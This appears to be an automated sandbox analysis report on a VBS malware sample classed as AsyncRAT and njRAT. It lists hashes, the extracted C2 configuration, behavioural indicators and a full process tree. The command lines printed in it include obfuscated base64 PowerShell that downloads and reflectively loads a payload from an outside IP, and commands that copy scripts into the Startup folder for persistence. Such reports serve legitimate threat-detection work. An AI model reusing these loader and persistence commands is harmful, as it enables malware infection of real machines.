asyncrat | 887420d1dcca02056fb9b2aaffacaf87ac76d438fb4e4b9f244cde119db7ebc6

Analysis

max time kernel
147s
max time network
151s
platform
windows10_x64
resource
win10-en-20211208
submitted
15-12-2021 18:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5d536406d735e27d910faf1813d79e0b.vbs
Size

151KB
MD5

5d536406d735e27d910faf1813d79e0b
SHA1

32f7716ddb61131917a90b83eb7fd74ce5eef16a
SHA256

887420d1dcca02056fb9b2aaffacaf87ac76d438fb4e4b9f244cde119db7ebc6
SHA512

1b797c0ada2656242d4017ecc33ce4045eece9a982cd4645e9e369e7d62ceed91e4f00ac14203077c349d8f815ed255d7fbe12742575e94f205bc319a9b365df

Score

10^/10

asyncrat njrat nyan cat rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/DownloaderF3.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

njss.duckdns.org:57831

Mutex

d51414327d6e

Attributes

reg_key
d51414327d6e
splitter
@!#&^%$

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/828-422-0x000000000040CBBE-mapping.dmp	asyncrat

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

12 1608 powershell.exe
32 984 powershell.exe
33 2856 powershell.exe
34 1652 powershell.exe

flow	pid	process
12	1608	powershell.exe
32	984	powershell.exe
33	2856	powershell.exe
34	1652	powershell.exe

Drops startup file 5 IoCs

Processes:

powershell.exeRegSvcs.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCR.vbs	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x1.vbs	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x2.vbs	RegSvcs.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1608 set thread context of 3396	1608	powershell.exe	RegSvcs.exe
PID 984 set thread context of 1412	984	powershell.exe	RegSvcs.exe
PID 2856 set thread context of 3132	2856	powershell.exe	RegSvcs.exe
PID 1652 set thread context of 828	1652	powershell.exe	RegSvcs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

RegSvcs.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings RegSvcs.exe
Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

1324 PING.EXE
3700 PING.EXE
3680 PING.EXE
3412 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	RegSvcs.exe

pid	process
1324	PING.EXE
3700	PING.EXE
3680	PING.EXE
3412	PING.EXE

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
1852	powershell.exe
1852	powershell.exe
1852	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
1016	powershell.exe
728	powershell.exe
1696	powershell.exe
728	powershell.exe
1016	powershell.exe
1696	powershell.exe
728	powershell.exe
1016	powershell.exe
1696	powershell.exe
1484	powershell.exe
1212	powershell.exe
3976	powershell.exe
1484	powershell.exe
1212	powershell.exe
3976	powershell.exe
1484	powershell.exe
1212	powershell.exe
3976	powershell.exe
2856	powershell.exe
984	powershell.exe
1652	powershell.exe
2856	powershell.exe
984	powershell.exe
1652	powershell.exe
2856	powershell.exe
984	powershell.exe
1652	powershell.exe
2856	powershell.exe
2856	powershell.exe
1652	powershell.exe
1652	powershell.exe

Suspicious use of AdjustPrivilegeToken 57 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegSvcs.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeRegSvcs.exeRegSvcs.exe

description	pid	process
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	3396	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: SeDebugPrivilege	728	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	3976	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	984	powershell.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: SeDebugPrivilege	828	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: SeDebugPrivilege	1412	RegSvcs.exe
Token: 33	1412	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1412	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	1412	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1412	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	1412	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1412	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	1412	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1412	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	1412	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1412	RegSvcs.exe
Token: 33	3396	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	3396	RegSvcs.exe
Token: 33	1412	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1412	RegSvcs.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exeRegSvcs.exeWScript.exeWScript.execmd.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 3064 wrote to memory of 936	3064	WScript.exe	cmd.exe
PID 3064 wrote to memory of 936	3064	WScript.exe	cmd.exe
PID 936 wrote to memory of 1324	936	cmd.exe	PING.EXE
PID 936 wrote to memory of 1324	936	cmd.exe	PING.EXE
PID 936 wrote to memory of 4092	936	cmd.exe	powershell.exe
PID 936 wrote to memory of 4092	936	cmd.exe	powershell.exe
PID 3064 wrote to memory of 1852	3064	WScript.exe	powershell.exe
PID 3064 wrote to memory of 1852	3064	WScript.exe	powershell.exe
PID 1852 wrote to memory of 1608	1852	powershell.exe	powershell.exe
PID 1852 wrote to memory of 1608	1852	powershell.exe	powershell.exe
PID 1608 wrote to memory of 1268	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 1268	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 1268	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 372	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 372	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 372	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 3396	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 3396	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 3396	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 3396	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 3396	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 3396	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 3396	1608	powershell.exe	RegSvcs.exe
PID 1608 wrote to memory of 3396	1608	powershell.exe	RegSvcs.exe
PID 3396 wrote to memory of 712	3396	RegSvcs.exe	WScript.exe
PID 3396 wrote to memory of 712	3396	RegSvcs.exe	WScript.exe
PID 3396 wrote to memory of 712	3396	RegSvcs.exe	WScript.exe
PID 3396 wrote to memory of 3992	3396	RegSvcs.exe	WScript.exe
PID 3396 wrote to memory of 3992	3396	RegSvcs.exe	WScript.exe
PID 3396 wrote to memory of 3992	3396	RegSvcs.exe	WScript.exe
PID 3396 wrote to memory of 3932	3396	RegSvcs.exe	WScript.exe
PID 3396 wrote to memory of 3932	3396	RegSvcs.exe	WScript.exe
PID 3396 wrote to memory of 3932	3396	RegSvcs.exe	WScript.exe
PID 3932 wrote to memory of 1800	3932	WScript.exe	cmd.exe
PID 3932 wrote to memory of 1800	3932	WScript.exe	cmd.exe
PID 3932 wrote to memory of 1800	3932	WScript.exe	cmd.exe
PID 3992 wrote to memory of 2672	3992	WScript.exe	cmd.exe
PID 3992 wrote to memory of 2672	3992	WScript.exe	cmd.exe
PID 3992 wrote to memory of 2672	3992	WScript.exe	cmd.exe
PID 2672 wrote to memory of 3680	2672	cmd.exe	PING.EXE
PID 2672 wrote to memory of 3680	2672	cmd.exe	PING.EXE
PID 2672 wrote to memory of 3680	2672	cmd.exe	PING.EXE
PID 3380 wrote to memory of 3700	3380	cmd.exe	PING.EXE
PID 3380 wrote to memory of 3700	3380	cmd.exe	PING.EXE
PID 3380 wrote to memory of 3700	3380	cmd.exe	PING.EXE
PID 1800 wrote to memory of 3412	1800	cmd.exe	PING.EXE
PID 1800 wrote to memory of 3412	1800	cmd.exe	PING.EXE
PID 1800 wrote to memory of 3412	1800	cmd.exe	PING.EXE
PID 3380 wrote to memory of 1016	3380	cmd.exe	powershell.exe
PID 3380 wrote to memory of 1016	3380	cmd.exe	powershell.exe
PID 3380 wrote to memory of 1016	3380	cmd.exe	powershell.exe
PID 1800 wrote to memory of 1696	1800	cmd.exe	powershell.exe
PID 1800 wrote to memory of 1696	1800	cmd.exe	powershell.exe
PID 1800 wrote to memory of 1696	1800	cmd.exe	powershell.exe
PID 2672 wrote to memory of 728	2672	cmd.exe	powershell.exe
PID 2672 wrote to memory of 728	2672	cmd.exe	powershell.exe
PID 2672 wrote to memory of 728	2672	cmd.exe	powershell.exe
PID 3932 wrote to memory of 1212	3932	WScript.exe	powershell.exe
PID 3932 wrote to memory of 1212	3932	WScript.exe	powershell.exe
PID 3932 wrote to memory of 1212	3932	WScript.exe	powershell.exe
PID 3992 wrote to memory of 1484	3992	WScript.exe	powershell.exe
PID 3992 wrote to memory of 1484	3992	WScript.exe	powershell.exe
PID 3992 wrote to memory of 1484	3992	WScript.exe	powershell.exe
PID 1484 wrote to memory of 2856	1484	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:936

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:1324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\5d536406d735e27d910faf1813d79e0b.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ IIZ.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙HM☙bg☙v☙HQ☙cwBl☙HQ☙Lw☙5☙DQ☙Lg☙5☙DE☙Lg☙x☙DQ☙Mg☙u☙DE☙OQ☙v☙C8☙OgBw☙HQ☙d☙Bo☙Cc☙KQ☙p☙☙==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.sn/tset/94.91.142.19//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:1268

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
PID:372

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
4⤵
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3396

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DCR.vbs"
5⤵
PID:712

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DCR.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ TWU.vbs')
6⤵
- Suspicious use of WriteProcessMemory
PID:3380

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
7⤵
- Runs ping.exe
PID:3700

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\DCR.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ TWU.vbs')
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙FI☙QwBE☙C8☙d☙Bz☙GU☙d☙☙v☙Dk☙N☙☙u☙Dk☙MQ☙u☙DE☙N☙☙y☙C4☙MQ☙5☙C8☙Lw☙6☙H☙☙d☙B0☙Gg☙Jw☙p☙Ck☙';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.RCD/tset/94.91.142.19//:ptth'))"
7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
PID:3336

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:828

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x1.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x1.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXQ.vbs')
6⤵
- Suspicious use of WriteProcessMemory
PID:2672

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
7⤵
- Runs ping.exe
PID:3680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x1.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ JXQ.vbs')
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC☙Hk☙d☙Bl☙Fs☙XQBd☙C☙☙J☙BE☙Ew☙T☙☙g☙D0☙I☙Bb☙FM☙eQBz☙HQ☙ZQBt☙C4☙QwBv☙G4☙dgBl☙HI☙d☙Bd☙Do☙OgBG☙HI☙bwBt☙EI☙YQBz☙GU☙Ng☙0☙FM☙d☙By☙Gk☙bgBn☙Cg☙K☙BO☙GU☙dw☙t☙E8☙YgBq☙GU☙YwB0☙C☙☙TgBl☙HQ☙LgBX☙GU☙YgBD☙Gw☙aQBl☙G4☙d☙☙p☙C4☙R☙Bv☙Hc☙bgBs☙G8☙YQBk☙FM☙d☙By☙Gk☙bgBn☙Cg☙JwBo☙HQ☙d☙Bw☙Do☙Lw☙v☙Dk☙MQ☙u☙DI☙N☙☙x☙C4☙MQ☙5☙C4☙N☙☙5☙C8☙cgBh☙G0☙Z☙Bl☙HM☙LwBE☙G8☙dwBu☙Gw☙bwBh☙GQ☙ZQBy☙EY☙Mw☙u☙HQ☙e☙B0☙Cc☙KQ☙p☙Ds☙WwBT☙Hk☙cwB0☙GU☙bQ☙u☙EE☙c☙Bw☙EQ☙bwBt☙GE☙aQBu☙F0☙Og☙6☙EM☙dQBy☙HI☙ZQBu☙HQ☙R☙Bv☙G0☙YQBp☙G4☙LgBM☙G8☙YQBk☙Cg☙J☙BE☙Ew☙T☙☙p☙C4☙RwBl☙HQ☙V☙B5☙H☙☙ZQ☙o☙Cc☙QwBs☙GE☙cwBz☙Ew☙aQBi☙HI☙YQBy☙Hk☙Mw☙u☙EM☙b☙Bh☙HM☙cw☙x☙Cc☙KQ☙u☙Ec☙ZQB0☙E0☙ZQB0☙Gg☙bwBk☙Cg☙JwBS☙HU☙bg☙n☙Ck☙LgBJ☙G4☙dgBv☙Gs☙ZQ☙o☙CQ☙bgB1☙Gw☙b☙☙s☙C☙☙WwBv☙GI☙agBl☙GM☙d☙Bb☙F0☙XQ☙g☙Cg☙JwB0☙Hg☙d☙☙u☙HM☙bg☙v☙HQ☙cwBl☙HQ☙Lw☙5☙DQ☙Lg☙5☙DE☙Lg☙x☙DQ☙Mg☙u☙DE☙OQ☙v☙C8☙OgBw☙HQ☙d☙Bo☙Cc☙KQ☙p☙☙==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('☙','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/DownloaderF3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.sn/tset/94.91.142.19//:ptth'))"
7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
PID:1136

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
8⤵
PID:3132

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x2.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:3932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x2.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WJK.vbs')
6⤵
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 10
7⤵
- Runs ping.exe
PID:3412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\x2.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WJK.vbs')
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
